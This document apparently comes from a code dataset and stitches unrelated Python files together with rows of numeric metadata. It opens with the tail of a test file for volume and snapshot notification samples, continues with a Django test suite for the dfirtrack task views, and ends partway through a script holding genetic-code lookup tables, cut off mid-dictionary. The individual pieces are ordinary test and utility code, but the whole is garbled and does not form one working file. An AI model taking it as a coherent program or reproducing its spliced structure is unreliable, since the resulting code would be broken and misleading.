self.assertIsNotNone(s)
self.assertEqual(s.name, name)
self.assertEqual(notification['payload']['volume_id'], s.resource_id)
self.assertEqual(notification['timestamp'], s.timestamp)
metadata = s.resource_metadata
self.assertEqual(notification['publisher_id'], metadata.get('host'))
def test_volume_exists(self):
v = notifications.Volume(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_EXISTS))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(
s, 'volume', NOTIFICATION_VOLUME_EXISTS)
self.assertEqual(1, s.volume)
def test_volume_size_exists(self):
v = notifications.VolumeSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_EXISTS))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(s, 'volume.size',
NOTIFICATION_VOLUME_EXISTS)
self.assertEqual(NOTIFICATION_VOLUME_EXISTS['payload']['size'],
s.volume)
def test_volume_delete(self):
v = notifications.Volume(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_DELETE))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(
s, 'volume', NOTIFICATION_VOLUME_DELETE)
self.assertEqual(1, s.volume)
def test_volume_size_delete(self):
v = notifications.VolumeSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_DELETE))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(s, 'volume.size',
NOTIFICATION_VOLUME_DELETE)
self.assertEqual(NOTIFICATION_VOLUME_DELETE['payload']['size'],
s.volume)
def test_volume_attach(self):
v = notifications.Volume(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_ATTACH))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(
s, 'volume', NOTIFICATION_VOLUME_ATTACH)
self.assertEqual(1, s.volume)
def test_volume_size_attach(self):
v = notifications.VolumeSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_ATTACH))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(s, 'volume.size',
NOTIFICATION_VOLUME_ATTACH)
self.assertEqual(NOTIFICATION_VOLUME_ATTACH['payload']['size'],
s.volume)
def test_volume_detach(self):
v = notifications.Volume(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_DETACH))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(
s, 'volume', NOTIFICATION_VOLUME_ATTACH)
self.assertEqual(1, s.volume)
def test_volume_size_detach(self):
v = notifications.VolumeSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_DETACH))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(s, 'volume.size',
NOTIFICATION_VOLUME_DETACH)
self.assertEqual(NOTIFICATION_VOLUME_DETACH['payload']['size'],
s.volume)
def test_volume_resize(self):
v = notifications.Volume(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_RESIZE))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(
s, 'volume', NOTIFICATION_VOLUME_RESIZE)
self.assertEqual(1, s.volume)
def test_volume_size_resize(self):
v = notifications.VolumeSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_VOLUME_RESIZE))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_volume(s, 'volume.size',
NOTIFICATION_VOLUME_RESIZE)
self.assertEqual(NOTIFICATION_VOLUME_RESIZE['payload']['size'],
s.volume)
def _verify_common_sample_snapshot(self, s, name, notification):
self.assertIsNotNone(s)
self.assertEqual(name, s.name)
self.assertEqual(notification['payload']['snapshot_id'], s.resource_id)
self.assertEqual(notification['timestamp'], s.timestamp)
metadata = s.resource_metadata
self.assertEqual(notification['publisher_id'], metadata.get('host'))
def test_snapshot_exists(self):
v = notifications.Snapshot(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_SNAPSHOT_EXISTS))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_snapshot(s, 'snapshot',
NOTIFICATION_SNAPSHOT_EXISTS)
self.assertEqual(1, s.volume)
def test_snapshot_size_exists(self):
v = notifications.SnapshotSize(mock.Mock())
samples = list(v.process_notification(NOTIFICATION_SNAPSHOT_EXISTS))
self.assertEqual(1, len(samples))
s = samples[0]
self._verify_common_sample_snapshot(s, 'snapshot.size',
NOTIFICATION_SNAPSHOT_EXISTS)
volume_size = NOTIFICATION_SNAPSHOT_EXISTS['payload']['volume_size']
self.assertEqual(volume_size, s.volume)
| 44.635514
| 79
| 0.639657
| 1,783
| 14,328
| 4.900729
| 0.134605
| 0.054932
| 0.019226
| 0.01545
| 0.829137
| 0.789311
| 0.777295
| 0.76173
| 0.756924
| 0.730373
| 0
| 0.120518
| 0.234994
| 14,328
| 320
| 80
| 44.775
| 0.676672
| 0.038107
| 0
| 0.711744
| 0
| 0
| 0.354616
| 0.149052
| 0
| 0
| 0
| 0
| 0.120996
| 1
| 0.049822
| false
| 0
| 0.010676
| 0
| 0.064057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c75d3c074bda401e2f00c41f96a27e86a47f048
| 8,318
|
py
|
Python
|
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_main/tests/task/test_task_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Task, Taskname, Taskpriority, Taskstatus
import urllib.parse
class TaskViewTestCase(TestCase):
""" task view tests """
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# create object
taskname_1 = Taskname.objects.create(taskname_name='taskname_1')
# create object
taskpriority_1 = Taskpriority.objects.create(taskpriority_name='prio_1')
# create object
taskstatus_1 = Taskstatus.objects.create(taskstatus_name='taskstatus_1')
# create object
Task.objects.create(
taskname = taskname_1,
taskpriority = taskpriority_1,
taskstatus = taskstatus_1,
task_created_by_user_id = test_user,
task_modified_by_user_id = test_user,
)
def test_tasks_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/', safe='')
# get response
response = self.client.get('/tasks/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_list.html')
def test_tasks_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_detail_not_logged_in(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/' + str(task_1.task_id), safe='')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_detail_logged_in(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_detail_template(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_detail.html')
def test_tasks_detail_get_user_context(self):
""" test detail view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/add/', safe='')
# get response
response = self.client.get('/tasks/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_add.html')
def test_tasks_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
def test_tasks_edit_not_logged_in(self):
""" test edit view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# create url
destination = '/login/?next=' + urllib.parse.quote('/tasks/' + str(task_1.task_id) + '/edit/', safe='')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_tasks_edit_logged_in(self):
""" test edit view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_tasks_edit_template(self):
""" test edit view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/task/tasks_edit.html')
def test_tasks_edit_get_user_context(self):
""" test edit view """
# get object
taskname_1 = Taskname.objects.get(taskname_name='taskname_1')
# get object
task_1 = Task.objects.get(taskname=taskname_1)
# login testuser
login = self.client.login(username='testuser_task', password='8dR7ilC8cnCr8U2aq14V')
# get response
response = self.client.get('/tasks/' + str(task_1.task_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_task')
| 37.133929
| 111
| 0.639336
| 944
| 8,318
| 5.427966
| 0.076271
| 0.054645
| 0.031616
| 0.071819
| 0.861827
| 0.827088
| 0.816354
| 0.808938
| 0.754879
| 0.748244
| 0
| 0.028249
| 0.242486
| 8,318
| 223
| 112
| 37.300448
| 0.784955
| 0.129959
| 0
| 0.530612
| 0
| 0
| 0.139825
| 0.019955
| 0
| 0
| 0
| 0
| 0.163265
| 1
| 0.173469
| false
| 0.132653
| 0.040816
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7caa8e0f4b0ca4c9cf0870cfced5abe7f00a5a3c
| 416,254
|
py
|
Python
|
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
conRadNullDistribution.py
|
jsharbrough/conRadNullDistribution
|
b5570ed7b496d968308182575b984b9f100720ba
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import random
def polSub(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 